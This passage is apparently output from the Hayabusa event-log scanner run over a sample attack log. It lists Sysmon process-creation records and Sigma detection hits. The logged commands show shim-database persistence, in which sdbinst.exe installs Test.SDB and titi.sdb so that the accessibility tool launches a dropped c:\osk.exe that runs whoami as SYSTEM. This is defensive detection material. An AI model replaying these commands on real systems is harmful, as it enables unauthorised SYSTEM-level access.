Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 